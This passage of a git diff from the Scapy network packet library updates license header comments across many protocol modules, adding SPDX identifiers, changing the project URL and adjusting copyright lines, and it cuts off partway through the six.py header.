Protocol diff --git a/scapy/layers/mgcp.py b/scapy/layers/mgcp.py index 34d020275a4..f813f47aa36 100644 --- a/scapy/layers/mgcp.py +++ b/scapy/layers/mgcp.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ MGCP (Media Gateway Control Protocol) diff --git a/scapy/layers/mobileip.py b/scapy/layers/mobileip.py index 67c2ce2059d..bf36c5a1cce 100644 --- a/scapy/layers/mobileip.py +++ b/scapy/layers/mobileip.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ Mobile IP. diff --git a/scapy/layers/netbios.py b/scapy/layers/netbios.py index 5aa12ffbb50..1d0ef16246d 100644 --- a/scapy/layers/netbios.py +++ b/scapy/layers/netbios.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ NetBIOS over TCP/IP diff --git a/scapy/layers/netflow.py b/scapy/layers/netflow.py index 8343b1c4e03..8f7918a35d0 100644 --- a/scapy/layers/netflow.py +++ b/scapy/layers/netflow.py @@ -1,9 +1,10 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license + # Netflow V5 appended by spaceB0x and Guillaume Valadon -# Netflow V9/10 appended ny Gabriel Potter +# Netflow V9/10 appended by Gabriel Potter """ Cisco NetFlow protocol v1, v5, v9 and v10 (IPFix) diff --git a/scapy/layers/ntlm.py b/scapy/layers/ntlm.py index 6e94d319f90..f97c35001e4 100644 --- a/scapy/layers/ntlm.py +++ b/scapy/layers/ntlm.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information -# Copyright (C) Gabriel Potter -# This program is published under a GPLv2 license +# See https://scapy.net/ for more information +# Copyright (C) Philippe Biondi """ NTLM diff --git a/scapy/layers/ntp.py b/scapy/layers/ntp.py index d896424b3ca..53743f9acdd 100644 --- a/scapy/layers/ntp.py +++ b/scapy/layers/ntp.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ NTP (Network Time Protocol). diff --git a/scapy/layers/pflog.py b/scapy/layers/pflog.py index a8d60d8e86d..1069f8c4448 100644 --- a/scapy/layers/pflog.py +++ b/scapy/layers/pflog.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ PFLog: OpenBSD PF packet filter logging. diff --git a/scapy/layers/ppp.py b/scapy/layers/ppp.py index b4b3257a28f..e9a29a6892a 100644 --- a/scapy/layers/ppp.py +++ b/scapy/layers/ppp.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ PPP (Point to Point Protocol) diff --git a/scapy/layers/pptp.py b/scapy/layers/pptp.py index eabb19c259e..6d228d36310 100644 --- a/scapy/layers/pptp.py +++ b/scapy/layers/pptp.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Jan Sebechlebsky -# This program is published under a GPLv2 license """ PPTP (Point to Point Tunneling Protocol) diff --git a/scapy/layers/radius.py b/scapy/layers/radius.py index 2d6794925a7..1a0ec16e53f 100644 --- a/scapy/layers/radius.py +++ b/scapy/layers/radius.py @@ -1,8 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information -# Copyright (C) Philippe Biondi -# Vincent Mauge -# This program is published under a GPLv2 license +# See https://scapy.net/ for more information +# Acknowledgment: Vincent Mauge """ RADIUS (Remote Authentication Dial In User Service) diff --git a/scapy/layers/rip.py b/scapy/layers/rip.py index 27ba712532e..fb6e701abd4 100644 --- a/scapy/layers/rip.py +++ b/scapy/layers/rip.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ RIP (Routing Information Protocol). diff --git a/scapy/layers/rtp.py b/scapy/layers/rtp.py index ee8f0b9c9c4..861debd6a82 100644 --- a/scapy/layers/rtp.py +++ b/scapy/layers/rtp.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ RTP (Real-time Transport Protocol). diff --git a/scapy/layers/sctp.py b/scapy/layers/sctp.py index e5128db7587..fb7cd575702 100644 --- a/scapy/layers/sctp.py +++ b/scapy/layers/sctp.py @@ -1,8 +1,8 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi # Copyright (C) 6WIND -# This program is published under a GPLv2 license """ SCTP (Stream Control Transmission Protocol). diff --git a/scapy/layers/sixlowpan.py b/scapy/layers/sixlowpan.py index 351139888ef..91469092bb4 100644 --- a/scapy/layers/sixlowpan.py +++ b/scapy/layers/sixlowpan.py @@ -1,9 +1,9 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Cesar A. Bernardini # Intern at INRIA Grand Nancy Est -# Copyright (C) Gabriel Potter -# This program is published under a GPLv2 license +# Copyright (C) Gabriel Potter """ 6LoWPAN Protocol Stack ====================== diff --git a/scapy/layers/skinny.py b/scapy/layers/skinny.py index 7f8f074a894..322cb47d89f 100644 --- a/scapy/layers/skinny.py +++ b/scapy/layers/skinny.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ Skinny Call Control Protocol (SCCP) diff --git a/scapy/layers/smb.py b/scapy/layers/smb.py index 2193d80cf10..0794bb57e01 100644 --- a/scapy/layers/smb.py +++ b/scapy/layers/smb.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ SMB (Server Message Block), also known as CIFS. diff --git a/scapy/layers/smb2.py b/scapy/layers/smb2.py index 37f9f0f9933..40619620379 100644 --- a/scapy/layers/smb2.py +++ b/scapy/layers/smb2.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ SMB (Server Message Block), also known as CIFS - version 2 diff --git a/scapy/layers/snmp.py b/scapy/layers/snmp.py index b4285a2eaa7..b691a07bc27 100644 --- a/scapy/layers/snmp.py +++ b/scapy/layers/snmp.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ SNMP (Simple Network Management Protocol). diff --git a/scapy/layers/tftp.py b/scapy/layers/tftp.py index 7e3614cdd88..2f4d77dad08 100644 --- a/scapy/layers/tftp.py +++ b/scapy/layers/tftp.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ TFTP (Trivial File Transfer Protocol). diff --git a/scapy/layers/tls/__init__.py b/scapy/layers/tls/__init__.py index ae84d9792fa..ab08adf001e 100644 --- a/scapy/layers/tls/__init__.py +++ b/scapy/layers/tls/__init__.py @@ -1,8 +1,9 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy +# See https://scapy.net/ for more information # Copyright (C) 2007, 2008, 2009 Arnaud Ebalard # 2015, 2016, 2017 Maxence Tury # 2019 Romain Perez -# This program is published under a GPLv2 license """ Tools for handling TLS sessions and digital certificates. diff --git a/scapy/layers/tls/all.py b/scapy/layers/tls/all.py index f226104154e..e757da815ef 100644 --- a/scapy/layers/tls/all.py +++ b/scapy/layers/tls/all.py @@ -1,7 +1,8 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy +# See https://scapy.net/ for more information # Copyright (C) 2007, 2008, 2009 Arnaud Ebalard # 2015, 2016, 2017 Maxence Tury -# This program is published under a GPLv2 license """ Aggregate top level objects from all TLS modules. diff --git a/scapy/layers/tls/automaton.py b/scapy/layers/tls/automaton.py index 0d593410879..d230863cbc0 100644 --- a/scapy/layers/tls/automaton.py +++ b/scapy/layers/tls/automaton.py @@ -1,7 +1,8 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy +# See https://scapy.net/ for more information # Copyright (C) 2007, 2008, 2009 Arnaud Ebalard # 2015, 2016, 2017 Maxence Tury -# This program is published under a GPLv2 license """ The _TLSAutomaton class provides methods common to both TLS client and server. diff --git a/scapy/layers/tls/automaton_cli.py b/scapy/layers/tls/automaton_cli.py index 0d61b7efca9..b191262aeed 100644 --- a/scapy/layers/tls/automaton_cli.py +++ b/scapy/layers/tls/automaton_cli.py @@ -1,8 +1,9 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy +# See https://scapy.net/ for more information # Copyright (C) 2007, 2008, 2009 Arnaud Ebalard # 2015, 2016, 2017 Maxence Tury # 2019 Romain Perez -# This program is published under a GPLv2 license """ TLS client automaton. This makes for a primitive TLS stack. diff --git a/scapy/layers/tls/automaton_srv.py b/scapy/layers/tls/automaton_srv.py index 1db118a385d..4f194e0a3ee 100644 --- a/scapy/layers/tls/automaton_srv.py +++ b/scapy/layers/tls/automaton_srv.py @@ -1,8 +1,9 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy +# See https://scapy.net/ for more information # Copyright (C) 2007, 2008, 2009 Arnaud Ebalard # 2015, 2016, 2017 Maxence Tury # 2019 Romain Perez -# This program is published under a GPLv2 license """ TLS server automaton. This makes for a primitive TLS stack. diff --git a/scapy/layers/tls/basefields.py b/scapy/layers/tls/basefields.py index bdefb64a443..6c4dc711cbe 100644 --- a/scapy/layers/tls/basefields.py +++ b/scapy/layers/tls/basefields.py @@ -1,7 +1,8 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy +# See https://scapy.net/ for more information # Copyright (C) 2007, 2008, 2009 Arnaud Ebalard # 2015, 2016, 2017 Maxence Tury -# This program is published under a GPLv2 license """ TLS base fields, used for record parsing/building. As several operations depend diff --git a/scapy/layers/tls/cert.py b/scapy/layers/tls/cert.py index 9b9e972d777..7095eab29c4 100644 --- a/scapy/layers/tls/cert.py +++ b/scapy/layers/tls/cert.py @@ -1,8 +1,9 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy +# See https://scapy.net/ for more information # Copyright (C) 2008 Arnaud Ebalard # # 2015, 2016, 2017 Maxence Tury -# This program is published under a GPLv2 license """ High-level methods for PKI objects (X.509 certificates, CRLs, asymmetric keys). diff --git a/scapy/layers/tls/crypto/__init__.py b/scapy/layers/tls/crypto/__init__.py index 063697b25dd..1644bbeee7e 100644 --- a/scapy/layers/tls/crypto/__init__.py +++ b/scapy/layers/tls/crypto/__init__.py @@ -1,7 +1,8 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy +# See https://scapy.net/ for more information # Copyright (C) 2007, 2008, 2009 Arnaud Ebalard # 2015, 2016 Maxence Tury -# This program is published under a GPLv2 license """ Cryptographic capabilities for TLS. diff --git a/scapy/layers/tls/crypto/all.py b/scapy/layers/tls/crypto/all.py index 9c31eff8e78..6288f049b41 100644 --- a/scapy/layers/tls/crypto/all.py +++ b/scapy/layers/tls/crypto/all.py @@ -1,7 +1,8 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy +# See https://scapy.net/ for more information # Copyright (C) 2007, 2008, 2009 Arnaud Ebalard # 2015, 2016, 2017 Maxence Tury -# This program is published under a GPLv2 license """ Aggregate some TLS crypto objects. diff --git a/scapy/layers/tls/crypto/cipher_aead.py b/scapy/layers/tls/crypto/cipher_aead.py index f322edb00e8..eed8bae0edf 100644 --- a/scapy/layers/tls/crypto/cipher_aead.py +++ b/scapy/layers/tls/crypto/cipher_aead.py @@ -1,7 +1,8 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy +# See https://scapy.net/ for more information # Copyright (C) 2007, 2008, 2009 Arnaud Ebalard # 2015, 2016, 2017 Maxence Tury -# This program is published under a GPLv2 license """ Authenticated Encryption with Associated Data ciphers. diff --git a/scapy/layers/tls/crypto/cipher_block.py b/scapy/layers/tls/crypto/cipher_block.py index 116898c259f..55134da9eea 100644 --- a/scapy/layers/tls/crypto/cipher_block.py +++ b/scapy/layers/tls/crypto/cipher_block.py @@ -1,7 +1,8 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy +# See https://scapy.net/ for more information # Copyright (C) 2007, 2008, 2009 Arnaud Ebalard # 2015, 2016, 2017 Maxence Tury -# This program is published under a GPLv2 license """ Block ciphers. diff --git a/scapy/layers/tls/crypto/cipher_stream.py b/scapy/layers/tls/crypto/cipher_stream.py index b60c543c8d8..dbe71c480f4 100644 --- a/scapy/layers/tls/crypto/cipher_stream.py +++ b/scapy/layers/tls/crypto/cipher_stream.py @@ -1,7 +1,8 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy +# See https://scapy.net/ for more information # Copyright (C) 2007, 2008, 2009 Arnaud Ebalard # 2015, 2016, 2017 Maxence Tury -# This program is published under a GPLv2 license """ Stream ciphers. diff --git a/scapy/layers/tls/crypto/ciphers.py b/scapy/layers/tls/crypto/ciphers.py index f2755b2c55f..ef5feb65c83 100644 --- a/scapy/layers/tls/crypto/ciphers.py +++ b/scapy/layers/tls/crypto/ciphers.py @@ -1,7 +1,8 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy +# See https://scapy.net/ for more information # Copyright (C) 2007, 2008, 2009 Arnaud Ebalard # 2015, 2016 Maxence Tury -# This program is published under a GPLv2 license """ TLS ciphers. diff --git a/scapy/layers/tls/crypto/common.py b/scapy/layers/tls/crypto/common.py index 9653824ebc0..d2ac9758cb1 100644 --- a/scapy/layers/tls/crypto/common.py +++ b/scapy/layers/tls/crypto/common.py @@ -1,6 +1,6 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license +# See https://scapy.net/ for more information """ TLS ciphers. diff --git a/scapy/layers/tls/crypto/compression.py b/scapy/layers/tls/crypto/compression.py index e540f1e7f4d..91137ba2075 100644 --- a/scapy/layers/tls/crypto/compression.py +++ b/scapy/layers/tls/crypto/compression.py @@ -1,7 +1,8 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy +# See https://scapy.net/ for more information # Copyright (C) 2007, 2008, 2009 Arnaud Ebalard # 2015, 2016 Maxence Tury -# This program is published under a GPLv2 license """ TLS compression. diff --git a/scapy/layers/tls/crypto/groups.py b/scapy/layers/tls/crypto/groups.py index 10b853a51b2..23b7672b029 100644 --- a/scapy/layers/tls/crypto/groups.py +++ b/scapy/layers/tls/crypto/groups.py @@ -1,7 +1,8 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy +# See https://scapy.net/ for more information # Copyright (C) 2007, 2008, 2009 Arnaud Ebalard # 2015, 2016, 2017 Maxence Tury -# This program is published under a GPLv2 license """ This is a register for DH groups from RFC 3526 and RFC 4306. diff --git a/scapy/layers/tls/crypto/h_mac.py b/scapy/layers/tls/crypto/h_mac.py index 664815e7baa..5ee48956628 100644 --- a/scapy/layers/tls/crypto/h_mac.py +++ b/scapy/layers/tls/crypto/h_mac.py @@ -1,7 +1,8 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy +# See https://scapy.net/ for more information # Copyright (C) 2007, 2008, 2009 Arnaud Ebalard # 2015, 2016 Maxence Tury -# This program is published under a GPLv2 license """ HMAC classes. diff --git a/scapy/layers/tls/crypto/hash.py b/scapy/layers/tls/crypto/hash.py index 0a427b27907..9b25cd65989 100644 --- a/scapy/layers/tls/crypto/hash.py +++ b/scapy/layers/tls/crypto/hash.py @@ -1,7 +1,8 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy +# See https://scapy.net/ for more information # Copyright (C) 2007, 2008, 2009 Arnaud Ebalard # 2015, 2016 Maxence Tury -# This program is published under a GPLv2 license """ Hash classes. diff --git a/scapy/layers/tls/crypto/hkdf.py b/scapy/layers/tls/crypto/hkdf.py index f9c69c49312..28cb002ce43 100644 --- a/scapy/layers/tls/crypto/hkdf.py +++ b/scapy/layers/tls/crypto/hkdf.py @@ -1,6 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy +# See https://scapy.net/ for more information # Copyright (C) 2017 Maxence Tury -# This program is published under a GPLv2 license """ Stateless HKDF for TLS 1.3. diff --git a/scapy/layers/tls/crypto/kx_algs.py b/scapy/layers/tls/crypto/kx_algs.py index 2fbc648c6e6..1f0b01e9599 100644 --- a/scapy/layers/tls/crypto/kx_algs.py +++ b/scapy/layers/tls/crypto/kx_algs.py @@ -1,7 +1,8 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy +# See https://scapy.net/ for more information # Copyright (C) 2007, 2008, 2009 Arnaud Ebalard # 2015, 2016, 2017 Maxence Tury -# This program is published under a GPLv2 license """ Key Exchange algorithms as listed in appendix C of RFC 4346. diff --git a/scapy/layers/tls/crypto/pkcs1.py b/scapy/layers/tls/crypto/pkcs1.py index 736cd9b8b1a..e5996590bd7 100644 --- a/scapy/layers/tls/crypto/pkcs1.py +++ b/scapy/layers/tls/crypto/pkcs1.py @@ -1,7 +1,8 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy +# See https://scapy.net/ for more information # Copyright (C) 2008 Arnaud Ebalard # 2015, 2016, 2017 Maxence Tury -# This program is published under a GPLv2 license """ PKCS #1 methods as defined in RFC 3447. diff --git a/scapy/layers/tls/crypto/prf.py b/scapy/layers/tls/crypto/prf.py index f31e25fc82f..4a4c81c6928 100644 --- a/scapy/layers/tls/crypto/prf.py +++ b/scapy/layers/tls/crypto/prf.py @@ -1,7 +1,8 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy +# See https://scapy.net/ for more information # Copyright (C) 2007, 2008, 2009 Arnaud Ebalard -# 2015, 2016, 2017 Maxence Tury -# This program is published under a GPLv2 license +# 2015, 2016, 2017 Maxence Tury """ TLS Pseudorandom Function. diff --git a/scapy/layers/tls/crypto/suites.py b/scapy/layers/tls/crypto/suites.py index 05e7894f33b..3c06fdf2c0f 100644 --- a/scapy/layers/tls/crypto/suites.py +++ b/scapy/layers/tls/crypto/suites.py @@ -1,7 +1,8 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy +# See https://scapy.net/ for more information # Copyright (C) 2007, 2008, 2009 Arnaud Ebalard # 2015, 2016, 2017 Maxence Tury -# This program is published under a GPLv2 license """ TLS cipher suites. diff --git a/scapy/layers/tls/extensions.py b/scapy/layers/tls/extensions.py index 8617b433108..316d22aeb80 100644 --- a/scapy/layers/tls/extensions.py +++ b/scapy/layers/tls/extensions.py @@ -1,6 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy +# See https://scapy.net/ for more information # Copyright (C) 2017 Maxence Tury -# This program is published under a GPLv2 license """ TLS handshake extensions. diff --git a/scapy/layers/tls/handshake.py b/scapy/layers/tls/handshake.py index 6e41865e993..02f1078af00 100644 --- a/scapy/layers/tls/handshake.py +++ b/scapy/layers/tls/handshake.py @@ -1,8 +1,9 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy +# See https://scapy.net/ for more information # Copyright (C) 2007, 2008, 2009 Arnaud Ebalard # 2015, 2016, 2017 Maxence Tury # 2019 Romain Perez -# This program is published under a GPLv2 license """ TLS handshake fields & logic. diff --git a/scapy/layers/tls/handshake_sslv2.py b/scapy/layers/tls/handshake_sslv2.py index fec805e22f1..78885d2b953 100644 --- a/scapy/layers/tls/handshake_sslv2.py +++ b/scapy/layers/tls/handshake_sslv2.py @@ -1,6 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy +# See https://scapy.net/ for more information # Copyright (C) 2017 Maxence Tury -# This program is published under a GPLv2 license """ SSLv2 handshake fields & logic. diff --git a/scapy/layers/tls/keyexchange.py b/scapy/layers/tls/keyexchange.py index 797636fa45a..e1e22a66993 100644 --- a/scapy/layers/tls/keyexchange.py +++ b/scapy/layers/tls/keyexchange.py @@ -1,8 +1,9 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy +# See https://scapy.net/ for more information # Copyright (C) 2007, 2008, 2009 Arnaud Ebalard # 2015, 2016, 2017 Maxence Tury # 2019 Romain Perez -# This program is published under a GPLv2 license """ TLS key exchange logic. diff --git a/scapy/layers/tls/keyexchange_tls13.py b/scapy/layers/tls/keyexchange_tls13.py index 1a63d1a00c4..87f979fd4d3 100644 --- a/scapy/layers/tls/keyexchange_tls13.py +++ b/scapy/layers/tls/keyexchange_tls13.py @@ -1,7 +1,8 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy +# See https://scapy.net/ for more information # Copyright (C) 2017 Maxence Tury # 2019 Romain Perez -# This program is published under a GPLv2 license """ TLS 1.3 key exchange logic. diff --git a/scapy/layers/tls/record.py b/scapy/layers/tls/record.py index c75957cd208..463504d28d5 100644 --- a/scapy/layers/tls/record.py +++ b/scapy/layers/tls/record.py @@ -1,9 +1,10 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy +# See https://scapy.net/ for more information # Copyright (C) 2007, 2008, 2009 Arnaud Ebalard # 2015, 2016, 2017 Maxence Tury # 2019 Romain Perez # 2019 Gabriel Potter -# This program is published under a GPLv2 license """ Common TLS fields & bindings. diff --git a/scapy/layers/tls/record_sslv2.py b/scapy/layers/tls/record_sslv2.py index 5b4e06abe20..abe5004610a 100644 --- a/scapy/layers/tls/record_sslv2.py +++ b/scapy/layers/tls/record_sslv2.py @@ -1,6 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy +# See https://scapy.net/ for more information # Copyright (C) 2017 Maxence Tury -# This program is published under a GPLv2 license """ SSLv2 Record. diff --git a/scapy/layers/tls/record_tls13.py b/scapy/layers/tls/record_tls13.py index 1147159586e..b505bc8e20f 100644 --- a/scapy/layers/tls/record_tls13.py +++ b/scapy/layers/tls/record_tls13.py @@ -1,7 +1,8 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy +# See https://scapy.net/ for more information # Copyright (C) 2017 Maxence Tury # 2019 Romain Perez -# This program is published under a GPLv2 license """ Common TLS 1.3 fields & bindings. diff --git a/scapy/layers/tls/session.py b/scapy/layers/tls/session.py index 45cef1e6a86..70a2f0c3ca4 100644 --- a/scapy/layers/tls/session.py +++ b/scapy/layers/tls/session.py @@ -1,8 +1,9 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy +# See https://scapy.net/ for more information # Copyright (C) 2007, 2008, 2009 Arnaud Ebalard # 2015, 2016, 2017 Maxence Tury # 2019 Romain Perez -# This program is published under a GPLv2 license """ TLS session handler. diff --git a/scapy/layers/tls/tools.py b/scapy/layers/tls/tools.py index c7f0edaed94..23c1a404e35 100644 --- a/scapy/layers/tls/tools.py +++ b/scapy/layers/tls/tools.py @@ -1,7 +1,8 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy +# See https://scapy.net/ for more information # Copyright (C) 2007, 2008, 2009 Arnaud Ebalard # 2015, 2016, 2017 Maxence Tury -# This program is published under a GPLv2 license """ TLS helpers, provided as out-of-context methods. diff --git a/scapy/layers/tuntap.py b/scapy/layers/tuntap.py index 443151ccd0a..a52dbd3ebc6 100644 --- a/scapy/layers/tuntap.py +++ b/scapy/layers/tuntap.py @@ -1,9 +1,8 @@ -# -*- mode: python3; indent-tabs-mode: nil; tab-width: 4 -*- +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi # Copyright (C) Michael Farrell -# This program is published under a GPLv2 license """ Implementation of TUN/TAP interfaces. diff --git a/scapy/layers/usb.py b/scapy/layers/usb.py index 8ce00ca8b9a..c7313b862f3 100644 --- a/scapy/layers/usb.py +++ b/scapy/layers/usb.py @@ -1,8 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information -# Copyright (C) Philippe Biondi -# Copyright (C) Gabriel Potter -# This program is published under a GPLv2 license +# See https://scapy.net/ for more information +# Copyright (C) Gabriel Potter """ Default USB frames & Basic implementation diff --git a/scapy/layers/vrrp.py b/scapy/layers/vrrp.py index d7b368a4dcf..be3d7d445dc 100644 --- a/scapy/layers/vrrp.py +++ b/scapy/layers/vrrp.py @@ -1,8 +1,8 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi # Copyright (C) 6WIND -# This program is published under a GPLv2 license """ VRRP (Virtual Router Redundancy Protocol). diff --git a/scapy/layers/vxlan.py b/scapy/layers/vxlan.py index e6c1da98cd4..d7c659cbd93 100644 --- a/scapy/layers/vxlan.py +++ b/scapy/layers/vxlan.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ Virtual eXtensible Local Area Network (VXLAN) diff --git a/scapy/layers/x509.py b/scapy/layers/x509.py index 984a3344fc2..327ddeeb719 100644 --- a/scapy/layers/x509.py +++ b/scapy/layers/x509.py @@ -1,8 +1,10 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# Enhanced by Maxence Tury -# This program is published under a GPLv2 license +# Acknowledgment: Maxence Tury + +# Cool history about this file: http://natisbad.org/scapy/index.html """ X.509 certificates. diff --git a/scapy/layers/zigbee.py b/scapy/layers/zigbee.py index 501da5f96bd..1610c10f47f 100644 --- a/scapy/layers/zigbee.py +++ b/scapy/layers/zigbee.py @@ -1,11 +1,10 @@ -# This program is published under a GPLv2 license +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Ryan Speers 2011-2012 # Copyright (C) Roger Meyer : 2012-03-10 Added frames -# Copyright (C) Gabriel Potter : 2018 +# Copyright (C) Gabriel Potter : 2018 # Copyright (C) 2020-2021 Dimitrios-Georgios Akestoridis -# This program is published under a GPLv2 license """ ZigBee bindings for IEEE 802.15.4. diff --git a/scapy/libs/__init__.py b/scapy/libs/__init__.py index a36a9fa2c15..55d363209d2 100644 --- a/scapy/libs/__init__.py +++ b/scapy/libs/__init__.py @@ -1,6 +1,6 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information -# This program is published under a GPLv2 license +# See https://scapy.net/ for more information """ Library bindings diff --git a/scapy/libs/ethertypes.py b/scapy/libs/ethertypes.py index baa405cc03a..8f18471f151 100644 --- a/scapy/libs/ethertypes.py +++ b/scapy/libs/ethertypes.py @@ -1,5 +1,5 @@ # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information """ /* diff --git a/scapy/libs/matplot.py b/scapy/libs/matplot.py index b725a7a1313..b6da620a040 100644 --- a/scapy/libs/matplot.py +++ b/scapy/libs/matplot.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ External link to matplotlib diff --git a/scapy/libs/six.py b/scapy/libs/six.py index 38cc256c566..94703a1b202 100644 --- a/scapy/libs/six.py +++ b/scapy/libs/six.py @@ -18,7 +18,7 @@ # OUT OF 